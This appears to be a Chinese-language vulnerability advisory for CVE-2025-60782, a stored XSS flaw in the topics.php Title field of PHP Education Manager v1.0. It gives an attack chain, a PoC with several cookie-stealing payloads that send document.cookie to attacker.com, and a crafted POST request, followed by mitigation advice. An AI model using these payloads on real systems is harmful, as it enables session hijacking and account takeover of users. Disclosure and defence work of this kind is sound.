CVE-2025-60782 PHP Education Manager 存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-60782

漏洞类型

存储型跨站脚本（Stored XSS）

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

PHP Education Manager v1.0

漏洞概述

CVE-2025-60782是PHP Education Manager v1.0中存在的一个存储型跨站脚本（Stored XSS）漏洞。该漏洞位于教育管理系统的topics管理模块（topics.php）中，具体出现在主题创建或更新时的Title字段。攻击者可以通过低权限认证账户，在Title字段中注入恶意的JavaScript载荷。由于系统未对用户输入进行充分的过滤和转义处理，恶意脚本将被持久化存储在服务器端数据库中。当其他用户（包括管理员）访问包含该主题的页面时，恶意脚本将在受害者浏览器中自动执行。

该漏洞的CVSS 3.1评分为5.4，属于中危级别。其攻击向量为网络攻击（AV:N），攻击复杂度低（AC:L），需要低权限认证（PR:L），且需要用户交互（UI:R）。由于是存储型XSS，影响范围为变更范围（S:C），对机密性（C:L）和完整性（I:L）产生低影响，但不影响可用性（A:N）。

PHP Education Manager是一款用于教育机构的管理系统，通常用于管理课程、主题、学生信息等内容。该系统的topics管理模块允许用户创建和管理讨论主题或课程主题。由于XSS漏洞的存在，攻击者可以利用此漏洞窃取用户会话cookie、进行钓鱼攻击、篡改页面内容或执行其他恶意操作，对教育机构和用户的数据安全构成威胁。

技术细节

该漏洞的技术原理在于topics.php文件中的Title字段未对用户输入进行适当的HTML实体编码或过滤。当用户通过POST请求提交主题创建或更新表单时，Title字段中的内容被直接存储到数据库中，而未进行任何安全处理。

在利用方式上，攻击者首先需要拥有系统的低权限账户（普通用户权限）。攻击者登录后，导航到topics管理模块，在创建新主题或更新现有主题时，在Title字段中输入恶意JavaScript代码，例如：<script>alert(document.cookie)</script>或更复杂的载荷如<img src=x onerror=fetch('http://attacker.com/steal?cookie='+document.cookie)>。

当恶意载荷被提交后，系统将其存储到数据库。由于缺乏输出编码，当其他用户（特别是管理员）查看主题列表或主题详情页面时，服务器从数据库中读取该Title字段内容并直接嵌入到HTML响应中，浏览器解析这些未转义的内容时便会执行其中的JavaScript代码。

由于该漏洞为存储型XSS，攻击载荷会持久存在，影响所有访问相关页面的用户。攻击者可以利用此漏洞进行会话劫持（窃取cookie）、钓鱼攻击（伪造登录表单）、恶意重定向、键盘记录等攻击活动。特别是在教育管理系统中，管理员通常拥有更高权限，一旦管理员的会话被劫持，可能导致整个系统被控制。

攻击链分析

STEP 1

步骤1：获取认证

攻击者通过注册或获取低权限用户账户，获得PHP Education Manager系统的合法访问权限。

STEP 2

步骤2：定位目标模块

攻击者登录系统后，导航至topics管理模块（topics.php），准备创建或编辑主题。

STEP 3

步骤3：注入恶意载荷

攻击者在主题的Title字段中输入精心构造的恶意JavaScript代码（如cookie窃取脚本），并提交表单。

STEP 4

步骤4：载荷持久化存储

由于系统未对Title字段进行输入过滤和输出编码，恶意脚本被直接存储到后端数据库中。

STEP 5

步骤5：触发恶意脚本执行

当其他用户（尤其是管理员）访问主题列表或主题详情页面时，恶意脚本从数据库读取并在受害者浏览器中自动执行。

STEP 6

步骤6：数据窃取与权限提升

恶意脚本窃取受害者会话cookie或执行其他恶意操作，攻击者利用窃取的会话可能获得更高权限（如管理员权限），从而控制整个系统。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-60782 PoC - Stored XSS in PHP Education Manager v1.0 -->
<!-- Vulnerability Location: topics.php - Title field -->

<!-- Step 1: Login as authenticated user (low privilege) -->
<!-- Step 2: Navigate to topics management module -->
<!-- Step 3: Inject malicious payload in the Title field during topic creation/update -->

<!-- Payload 1: Basic Cookie Stealer -->
<script>document.location='http://attacker.com/steal.php?cookie='+document.cookie</script>

<!-- Payload 2: Using img tag with onerror event -->
<img src=x onerror="fetch('http://attacker.com/log?data='+btoa(document.cookie))">

<!-- Payload 3: Using SVG with onload event -->
<svg onload="new Image().src='http://attacker.com/x?c='+document.cookie">

<!-- HTTP Request Example -->
POST /topics.php HTTP/1.1
Host: target-education-manager.com
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=authenticated_session

title=<script>document.location='http://attacker.com/steal?c='+document.cookie</script>&description=test&action=create

影响范围

PHP Education Manager v1.0

防御指南

临时缓解措施

在等待官方修复之前，建议采取以下临时缓解措施：1）在前端和后端同时对Title字段实施输入过滤，拒绝包含<script>、<img>、onerror等危险标签和事件属性的输入；2）在输出时使用htmlspecialchars()等函数对Title字段内容进行HTML实体编码；3）部署Web应用防火墙（WAF）规则，检测和阻止常见的XSS攻击载荷；4）限制低权限用户创建和编辑主题的权限，仅允许可信用户操作；5）为管理员账户启用多因素认证（MFA），降低会话劫持风险；6）设置HttpOnly标志保护cookie，防止JavaScript直接访问会话cookie。